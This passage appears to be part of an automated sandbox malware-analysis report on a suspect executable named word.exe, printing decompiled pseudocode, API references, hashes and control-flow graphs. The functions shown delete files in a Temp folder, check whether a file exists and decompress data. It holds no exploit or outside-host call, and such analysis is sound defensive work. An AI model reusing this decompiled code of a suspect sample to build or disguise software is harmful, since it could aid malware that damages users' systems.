					_t71 =  &(_t67[lstrlenA(_t67)]); // executed
					_t38 = FindFirstFileA(0x421538,  &_v332); // executed
					__eflags = _t38 - 0xffffffff;
					_v8 = _t38;
					if(_t38 == 0xffffffff) {
						L26:
						__eflags = _a4;
						if(_a4 != 0) {
							_t32 = _t71 - 1;
							 *_t32 =  *(_t71 - 1) & 0x00000000;
							__eflags =  *_t32;
						}
						goto L28;
					} else {
						goto L9;
					}
					do {
						L9:
						_t75 =  &(_v332.cFileName);
						_t50 = E00405612( &(_v332.cFileName), 0x3f);
						__eflags =  *_t50;
						if( *_t50 != 0) {
							__eflags = _v332.cAlternateFileName;
							if(_v332.cAlternateFileName != 0) {
								_t75 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t75 - 0x2e;
						if( *_t75 != 0x2e) {
							L16:
							E00405AF4(_t71, _t75);
							__eflags = _v332.dwFileAttributes & 0x00000010;
							if((_v332.dwFileAttributes & 0x00000010) == 0) {
								E004057AC(_t67);
								_t53 = DeleteFileA(_t67);
								__eflags = _t53;
								if(_t53 != 0) {
									E00404E9F(0xfffffff2, _t67);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x423fa8 =  *0x423fa8 + 1;
									} else {
										E00404E9F(0xfffffff1, _t67);
										_push(0);
										_push(_t67);
										E00405842();
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E00405426(_t71, __eflags, _t67, _a8);
								}
							}
							goto L24;
						}
						_t62 =  *((intOrPtr*)(_t75 + 1));
						__eflags = _t62;
						if(_t62 == 0) {
							goto L24;
						}
						__eflags = _t62 - 0x2e;
						if(_t62 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t75 + 2));
						if( *((char*)(_t75 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t56 = FindNextFileA(_v8,  &_v332); // executed
						__eflags = _t56;
					} while (_t56 != 0);
					_t38 = FindClose(_v8); // executed
					goto L26;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00405D9C(_t67);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E004055E7(_t67);
							E004057AC(_t67);
							_t38 = RemoveDirectoryA(_t67); // executed
							__eflags = _t38;
							if(_t38 != 0) {
								return E00404E9F(0xffffffe5, _t67);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404E9F(0xfffffff1, _t67);
							_push(0);
							_push(_t67);
							return E00405842();
						}
						L30:
						 *0x423fa8 =  *0x423fa8 + 1;
						return _t38;
					}
					__eflags = _t68 & 0x00000002;
					if((_t68 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

















                                                          0x00405430
                                                          0x00405435
                                                          0x0040543a
                                                          0x0040543d
                                                          0x00405443
                                                          0x00405446
                                                          0x0040544e
                                                          0x00405450
                                                          0x00405451
                                                          0x00000000
                                                          0x00405451
                                                          0x0040545c
                                                          0x00405460
                                                          0x00405460
                                                          0x00405460
                                                          0x00405464
                                                          0x00405477
                                                          0x0040547e
                                                          0x00405483
                                                          0x00405487
                                                          0x00405497
                                                          0x00405489
                                                          0x0040548f
                                                          0x0040548f
                                                          0x004054a2
                                                          0x004054b7
                                                          0x004054b9
                                                          0x004054bf
                                                          0x004054c2
                                                          0x004054c5
                                                          0x00405582
                                                          0x00405582
                                                          0x00405586
                                                          0x00405588
                                                          0x00405588
                                                          0x00405588
                                                          0x00405588
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004054cb
                                                          0x004054cb
                                                          0x004054d4
                                                          0x004054da
                                                          0x004054df
                                                          0x004054e2
                                                          0x004054e4
                                                          0x004054e8
                                                          0x004054ea
                                                          0x004054ea
                                                          0x004054e8
                                                          0x004054ed
                                                          0x004054f0
                                                          0x00405503
                                                          0x00405505
                                                          0x0040550a
                                                          0x00405511
                                                          0x00405529
                                                          0x0040552f
                                                          0x00405535
                                                          0x00405537
                                                          0x0040555c
                                                          0x00405539
                                                          0x00405539
                                                          0x0040553d
                                                          0x00405551
                                                          0x0040553f
                                                          0x00405542
                                                          0x00405547
                                                          0x00405549
                                                          0x0040554a
                                                          0x0040554a
                                                          0x0040553d
                                                          0x00405513
                                                          0x00405519
                                                          0x0040551b
                                                          0x00405521
                                                          0x00405521
                                                          0x0040551b
                                                          0x00000000
                                                          0x00405511
                                                          0x004054f2
                                                          0x004054f5
                                                          0x004054f7
                                                          0x00000000
                                                          0x00000000
                                                          0x004054f9
                                                          0x004054fb
                                                          0x00000000
                                                          0x00000000
                                                          0x004054fd
                                                          0x00405501
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405561
                                                          0x0040556b
                                                          0x00405571
                                                          0x00405571
                                                          0x0040557c
                                                          0x00000000
                                                          0x00405466
                                                          0x00405466
                                                          0x00405468
                                                          0x0040558c
                                                          0x0040558f
                                                          0x00405592
                                                          0x004055e4
                                                          0x004055e4
                                                          0x004055e4
                                                          0x00405594
                                                          0x00405597
                                                          0x004055a2
                                                          0x004055a7
                                                          0x004055a9
                                                          0x00000000
                                                          0x00000000
                                                          0x004055ac
                                                          0x004055b2
                                                          0x004055b8
                                                          0x004055be
                                                          0x004055c0
                                                          0x00000000
                                                          0x004055dc
                                                          0x004055c2
                                                          0x004055c6
                                                          0x00000000
                                                          0x00000000
                                                          0x004055cb
                                                          0x004055d0
                                                          0x004055d1
                                                          0x00000000
                                                          0x004055d2
                                                          0x00405599
                                                          0x00405599
                                                          0x00000000
                                                          0x00405599
                                                          0x0040546e
                                                          0x00405471
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405471

                                                          APIs
                                                          • DeleteFileA.KERNELBASE(?,?,755513E0,00000000), ref: 00405446
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\*.*,?,C:\Users\user\AppData\Roaming\word.exe,?,755513E0,00000000), ref: 0040548F
                                                          • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\*.*,?,C:\Users\user\AppData\Roaming\word.exe,?,755513E0,00000000), ref: 004054A2
                                                          • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\*.*,?,C:\Users\user\AppData\Roaming\word.exe,?,755513E0,00000000), ref: 004054A8
                                                          • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\*.*,?,C:\Users\user\AppData\Roaming\word.exe,?,755513E0,00000000), ref: 004054B9
                                                          • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 0040556B
                                                          • FindClose.KERNELBASE(?), ref: 0040557C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\*.*$C:\Users\user\AppData\Roaming\word.exe$\*.*
                                                          • API String ID: 2035342205-1670639503
                                                          • Opcode ID: 178659d5dd2b5e4005abbb3c6ac50f0bcaef0d38e253c4ce23e3dec6c8ab0d63
                                                          • Instruction ID: 72c9b9ae93c356e5fbaabc5fff99037f1728fc53f432d7f95e6e75a23a32325d
                                                          • Opcode Fuzzy Hash: 178659d5dd2b5e4005abbb3c6ac50f0bcaef0d38e253c4ce23e3dec6c8ab0d63
                                                          • Instruction Fuzzy Hash: C941D070804A087ACB21AB358C85BEF3A6DDF01355F14847BB846B61D6C63C9E81CEAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 582 405d9c-405dc5 SetErrorMode FindFirstFileA SetErrorMode 583 405dd2 582->583 584 405dc7-405dd0 FindClose 582->584 585 405dd4-405dd7 583->585 584->585
                                                          C-Code - Quality: 100%
                                                          			E00405D9C(CHAR* _a4) {
				void* _t3;
				void* _t8;

				SetErrorMode(0x8001); // executed
				_t3 = FindFirstFileA(_a4, 0x422580); // executed
				_t8 = _t3; // executed
				SetErrorMode(0); // executed
				if(_t8 == 0xffffffff) {
					return 0;
				}
				FindClose(_t8); // executed
				return 0x422580;
			}





                                                          0x00405daa
                                                          0x00405db6
                                                          0x00405dbe
                                                          0x00405dc0
                                                          0x00405dc5
                                                          0x00000000
                                                          0x00405dd2
                                                          0x00405dc8
                                                          0x00000000

                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008001,00000000,C:\,?,0040570B,C:\,C:\,00000000,C:\,C:\,?,C:\Users\user\AppData\Roaming\word.exe,755513E0,0040543A,?,755513E0), ref: 00405DAA
                                                          • FindFirstFileA.KERNELBASE(?,00422580), ref: 00405DB6
                                                          • SetErrorMode.KERNELBASE(00000000), ref: 00405DC0
                                                          • FindClose.KERNELBASE(00000000), ref: 00405DC8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ErrorFindMode$CloseFileFirst
                                                          • String ID: C:\
                                                          • API String ID: 2885216544-3404278061
                                                          • Opcode ID: 863b284ad5a92f7a1a8a6f5dd5e6c1c033b4ab17d74f49b76f5d02ce1b12dfb3
                                                          • Instruction ID: a6a8c167051aeed94988b7bc9a417df50a67df51a882c0690b661480960f0059
                                                          • Opcode Fuzzy Hash: 863b284ad5a92f7a1a8a6f5dd5e6c1c033b4ab17d74f49b76f5d02ce1b12dfb3
                                                          • Instruction Fuzzy Hash: A8E08632B0455067C20017B46D4CE073658DF85721F208533B240B62D0D5B55C118BFA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406083 Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 653 406083-406088 654 4060f9-406117 653->654 655 40608a-4060b9 653->655 658 4066ef-406704 654->658 656 4060c0-4060c4 655->656 657 4060bb-4060be 655->657 660 4060c6-4060ca 656->660 661 4060cc 656->661 659 4060d0-4060d3 657->659 662 406706-40671c 658->662 663 40671e-406734 658->663 665 4060f1-4060f4 659->665 666 4060d5-4060de 659->666 660->659 661->659 664 406737-40673e 662->664 663->664 667 406740-406744 664->667 668 406765-406771 664->668 671 4062c6-4062e4 665->671 669 4060e0 666->669 670 4060e3-4060ef 666->670 674 4068f3-4068fd 667->674 675 40674a-406762 667->675 681 405f07-405f10 668->681 669->670 677 406159-406187 670->677 672 4062e6-4062fa 671->672 673 4062fc-40630e 671->673 680 406311-40631b 672->680 673->680 682 406909-40691c 674->682 675->668 678 4061a3-4061bd 677->678 679 406189-4061a1 677->679 683 4061c0-4061ca 678->683 679->683 687 40631d 680->687 688 4062be-4062c4 680->688 685 405f16 681->685 686 40691e 681->686 684 406921-406925 682->684 690 4061d0 683->690 691 406141-406147 683->691 692 405fc2-405fc6 685->692 693 406032-406036 685->693 694 405f1d-405f21 685->694 695 40605d-40607e 685->695 686->684 696 406299-40629d 687->696 697 40642e-40643b 687->697 688->671 689 406262-40626c 688->689 698 4068b1-4068bb 689->698 699 406272-406294 689->699 712 406126-40613e 690->712 713 40688d-406897 690->713 700 4061fa-406200 691->700 701 40614d-406153 691->701 705 406872-40687c 692->705 706 405fcc-405fe5 692->706 709 406881-40688b 693->709 710 40603c-406050 693->710 694->682 708 405f27-405f34 694->708 695->658 703 4062a3-4062bb 696->703 704 4068a5-4068af 696->704 697->681 702 40648a-406499 697->702 698->682 699->697 714 40625e 700->714 716 406202-406220 700->716 701->677 701->714 702->658 703->688 704->682 705->682 715 405fe8-405fec 706->715 708->686 711 405f3a-405f80 708->711 709->682 717 406053-40605b 710->717 721 405f82-405f86 711->721 722 405fa8-405faa 711->722 712->691 713->682 714->689 715->692 718 405fee-405ff4 715->718 719 406222-406236 716->719 720 406238-40624a 716->720 717->693 717->695 727 405ff6-405ffd 718->727 728 40601e-406030 718->728 729 40624d-406257 719->729 720->729 723 405f91-405f9f GlobalAlloc 721->723 724 405f88-405f8b GlobalFree 721->724 725 405fb8-405fc0 722->725 726 405fac-405fb6 722->726 723->686 733 405fa5 723->733 724->723 725->715 726->725 726->726 730 406008-406018 GlobalAlloc 727->730 731 405fff-406002 GlobalFree 727->731 728->717 729->700 732 406259 729->732 730->686 730->728 731->730 735 406899-4068a3 732->735 736 4061df-4061f7 732->736 733->722 735->682 736->700
                                                          C-Code - Quality: 98%
                                                          			E00406083() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
